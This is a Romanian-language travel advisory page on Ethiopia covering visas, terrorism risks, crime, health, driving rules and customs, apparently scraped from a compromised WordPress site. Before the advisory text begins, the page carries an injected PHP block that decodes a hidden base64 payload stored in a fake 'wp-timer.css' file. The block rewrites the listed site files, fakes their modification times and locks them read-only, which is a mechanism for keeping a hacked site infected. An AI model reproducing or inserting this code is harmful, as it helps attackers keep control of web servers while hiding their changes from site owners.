$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Etiopia – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români care doresc să călătorească in Etiopia au nevoie de viza de intrare. Valabilitatea vizelor este stabilită de Autoritatea etiopiană pentru Imigraţie. Aceasta se acordă, pentru o singură intrare şi o şedere de 30 de zile., după care, la cerere, se poate prelungi.

Viza turistică poate fi prelungită până la 3 luni. Pentru prelungirea peste această perioadă, cetăţenii străini trebuie să prezinte documente care să ateste motivul prelungirii şederii, caz în care i se va emite permis de şedere temporară sau permanentă. Dacă viza de şedere a expirat, înaintea părăsirii teritoriului Etiopiei, trebuie solicitat în mod imperativ prelungirea vizei la Main Immigration Office din Addis Abeba. Neîndeplinirea acestei obligaţii se pedepseşte, de regulă, cu amendă cu 20 USD, pentru fiecare lună peste durata de valabilitate a vizei şi o amendă de 300 USD ce poate fi decisă de autoritatea judiciară. După achitarea amenzilor se mai plăteşte o taxă de 20 USD pentru viza de ieşire din ţară (aceasta viză de ieşire nu este cerută dacă se respectă durata legală de şedere). Plata amenzilor se face exclusiv în valută străină (USD, euro).

Cetăţenii străini care au intrat în Etiopia cu viză turistică nu pot obţine permis de muncă în această ţară.

Pentru informaţii suplimentare despre condiţiile de intrare şi regimul de şedere în Etiopia, vă recomandăm să solicitaţi sau să consultaţi informaţiile oficiale furnizate de autorităţile etiopiene:

  • Permanent Mission of Ethiopia to the United Nations Office at Geneva
    and Other International Organizations in Switzerland
    56, Rue de Moillebeau, P.O. Box 338
    1211 Geneva 19, Tel. +41 22- 919 70 10, Fax +41 22 – 919 70 29, adresă email – mission.ethiopia@ties.itu.int., website: www.ethiopianmission.ch
  • Ministerul Afacerilor Externe al Etiopiei (www.mfa.gov.et).
  • La orice altă ambasadă a Etiopiei.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste

Autorităţile etiopiene atrag periodic atenţia populaţiei asupra riscului producerii de atacuri teroriste.
Indiferent de scopul călătoriei, trebuie evitate deplasările în zonele considerate periculoase: regiunea Ogaden, regiunea Gambela, oraşul Gambela, zona de est a liniei Harar – Gode, drumul ce leagă oraşele Harar şi Kebri Dehar.
De asemenea, cetăţenii români sunt sfătuiţi, cu insistenţă, să evite călătoriile în zonele de frontieră cu Eritrea, Kenya şi Somalia. De altfel, frontiera cu Eritrea rămâne închisă din cauza situaţiei tensionate dintre cele două state.
Deplasarea în depresiunea Danakil, în zonele turistice de la Muntele Dallol şi vulcanul Erta Ale, nu este recomandată. Există în continuare drumuri minate, iar securitatea rămâne precară pentru turişti.
Recomandăm cetăţenilor români care călătoresc sau se află în Etiopia să consulte periodic informaţiile prezentate de Ministerul Afacerilor Externe din Etiopia (www.mfa.gov.et).
Recomandăm, de asemenea, accesarea periodică a paginii web a Ministerului Afacerilor Externe român (www.mae.ro ).

Siguranţă şi criminalitate

Recomandăm cetăţenilor români care sunt nevoiţi să se deplaseze în Etiopia, să se informeze în prealabil asupra situaţiei de securitate din această ţară şi să manifeste atenţie sporita pe toată durata prezenţei lor in acest stat, deoarece agresiunile asupra cetăţenilor străini şi criminalitatea sunt in creştere. Tipurile de infracţiuni frecvente sunt furturile, înşelăciunile sau traficul ilegal de valută.
Situaţia de securitate este precară, iar posibilităţile de intervenţie şi de protecţie din partea autorităţilor locale sunt reduse.

Recomandări generale: 

  • Evitaţi circulaţia pe timp de noapte!
  • Evitaţi  locurile aglomerate, demonstraţiile şi deplasarea în zone izolate ale ţării!
  • Orice deplasare în zonele turistice să se realizeze prin birourile de turism acreditate!
  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi să nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini!
  • În timpul deplasării cu autoturismul, geamurile acestuia trebuie să rămână tot timpul ridicate, iar uşile blocate! Nu ieşiţi din vehicul, decât în prezenţa unui poliţist.
  • Respectaţi anunţurile sau recomandările autorităţilor locale!
  • Evitaţi deplasarea cu mijloacele de transport în comun (tren, autobuze, microbuze)!
  • Fotografierea clădirilor şi infrastructurilor sau obiectivelor ce pot fi considerate sensibile este strict interzisă: infrastructuri rutiere, baze militare, cazarme, închisori, reşedinţele demnitarilor, clădirile administraţiei centrale sau regionale.
  • În caz de agresiune nu opuneţi rezistenţă.
  • Consumaţi numai apă îmbuteliată sau apă fiartă în prealabil.
  • Evitaţi îngheţata, sucul de fructe proaspăt, legumele şi fructele crude cu excepţia celor ce pot fi curăţate de coajă.
  • Evitaţi să mâncaţi alimente care nu sunt bine prăjite.

În estul Etiopiei, călătoria cu trenul este recomandată să aibă loc doar pe timp de zi. Trenul ce leagă oraşele Dire Dawa şi Djibouti a fost în repetate rânduri ţinta unor atacuri.
În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei.
În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi Ambasada României din Addis Abeba .

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor, trebuie apelate următoarele numere de urgenţă :

  • 911 – Serviciul de urgenţe Poliţie
  • 0116-628222 – Poliţia de circulaţie
  • 912 – Pompieri
  • 907 şi 92 – Serviciul de Ambulanţă Crucea Roşie.

Sistemul medical

Cetăţenii români sunt sfătuiţi, cu insistenţă, să îşi încheie asigurare de călătorie, medicală şi de viaţă!
Posibilităţile de asistenţă medicală din această ţară sunt, în general, reduse.
În Etiopia există riscul îmbolnăvirilor de malarie, tuberculoza, febră tifoidă, diaree acută, hepatită B, febră galbenă, meningo-encefalită, ameoba, SIDA/HIV.
Este obligatorie efectuarea vaccinurilor împotriva febrei galbene.
Holera a fost semnalată în regiunile Oromiya, SNNPR, Tigray, Afar, Amhara şi Somali.
Luaţi toate măsurile necesare de prevenire a SIDA/VIH. Transfuziile de sânge se vor face exclusiv în caz de necesitate absolută.
Vă recomandăm să respectaţi cu stricteţe măsurile de igiena.

Unităţi spitaliceşti recomandate din Addis Abeba:

  • Spitalul St. Gabriel – 011-661-36-22,
  • Spitalul Hayat – 011-662-44-88,
  • Myung Sung International Medical center (Spitalul sud-coreean) – 011-629-29-63,
  • Swedish Clinic – 011-371-07-68,
  • Spitalul Balcha (rusesc) 0115-513-205,
  • Spitalul Black Lion – 0115-511-211,
  • Addis Cardiac Hospital – 0116-180-709.

Călătoriile la o altitudine înaltă pot determina probleme de sănătate: dificultăţi de respiraţie, oboseală, ameţeli, dureri de cap, insomnii.
Pentru informaţii cu privire la tipurile de vaccinuri care trebuie efectuate, cetăţenii români sunt sfătuiţi să se adreseze Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile.

Condiţii privind traficul auto

  • Starea drumurilor:

Drumurile şi arterele principale din capitală şi împrejurimile imediate sunt într-o stare relativ bună.

  • Circulaţia auto:

Sistemul de circulaţie auto este similar celui european (circulaţia pe dreapta).

  • Limite de viteză admise:
    • 80 km/h în localitate şi
    • 150 Km/h în afara localităţii.
  • Parcarea:

Parcarea se poate face numai în locurile permise.

  • Centura de siguranţă:

Este obligatorie.

  • Permisul de conducere:

Este obligatorie deţinerea unui permis de conducere etiopian, care se obţine în baza celui românesc. Valabilitatea permiselor de conducere este, de regulă de 2 ani.

Informaţii pentru cazurile de accident de circulaţie:

În cazul producerii unui accident de circulaţie se contactează imediat ADDIS ABEBA TRAFFIC POLICE, la telefon: (011)-6628222 (pentru urgenţe) sau (011)-6622738 (pentru informaţii), pentru a constata, la faţa locului, cauzele accidentului şi pentru a decide măsurile necesare.

Utilizarea cărţilor de credit

În Etiopia pot fi utilizate cărţile de credit la hotelurile mari din Addis Abeba, la companiile aeriene, în unele agenţii de voiaj şi într-un număr foarte redus de magazine.
Există puţine bancomate ATM. Pentru a retrage bani, este acceptată numai cartea de credit VISA.

Reglementări vamale

Nu sunt admise, la intrarea sau ieşirea din ţară, obiectele considerate periculoase pentru siguranţa călătorilor sau siguranţa de stat.

Cetăţenii străini trebuie să declare la intrarea pe teritoriul etiopian valutele străine aflate în posesia lor dacă acestea depăşesc 3000 USD. În acest scop se solicită şi se completează un formular special disponibil la frontieră. Formularul trebuie păstrat deoarece poate fi solicitat de autorităţi în interiorul ţării. La părăsirea Etiopiei, niciun cetăţean străin nu are voie să posede mai mult de 3000 USD, cu excepţia cazurilor în care poate dovedi provenienţa legală a valutei. Cei care intră sau părăsesc teritoriul Etiopiei nu pot deţine asupra lor mai mult de 200 ETB – birr (moneda naţională etiopiană).

Sunt admise, fără taxe vamale, obiectele de uz personal:

  • 200 bucăţi ţigarete,
  • 50 bucăţi ţigări de foi,
  • 1 litru băuturi alcoolice,
  • 50 ml parfum.

Echipamentul electrocasnic, DVD players, videocamere, telefoanele celulare, laptop-uri, imprimante, casetofoane trebuiesc declarate la intrare.

Nu este admisă scoaterea din ţară a obiectelor interzise comercializării (piei de animale, obiecte din fildeş, obiecte de artă veche etc.). Pentru suvenirurile cumparate este necesară păstrarea chitanţei. Pentru obiecte de artă este recomandabilă obţinerea unui certificat de export de la Muzeul Naţional din Addis Abeba.
Informaţii suplimentare pot fi obţinute de la Ethiopian Customs Authority, P.O.Box no. 3248 Addis Abeba, Tel: (00251)-(011) 5513100; Fax: (00251)-(011) 5518355.

Regimul medicamentelor

Tipurile de medicamente permise la import sunt menţionate în Lista revizuită emisă de Autoritatea de Administrare şi Control a Medicamentelor, sub rezerva actualizării permanente a acesteia, în funcţie de ultimele descoperiri în materie. Medicamentele care nu se află în această listă sunt considerate interzise la import.

Mai multe detalii se pot obţine de la Autoritatea Etiopiană de Administrare şi Control a Medicamentelor (Ethiopian Drug Administration and Control Authority), P.O.Box 5681 Addis Ababa, Tel: (00251)-(011) 5524117; Fax: (00251)-(011) 5521392, E-mail: daca@ethionet.et

Turiştii pot avea asupra lor medicamentele uzuale, pentru stricta necesitate personală. Farmaciile nu sunt aprovizionate corespunzător cu medicamente.

By o9admin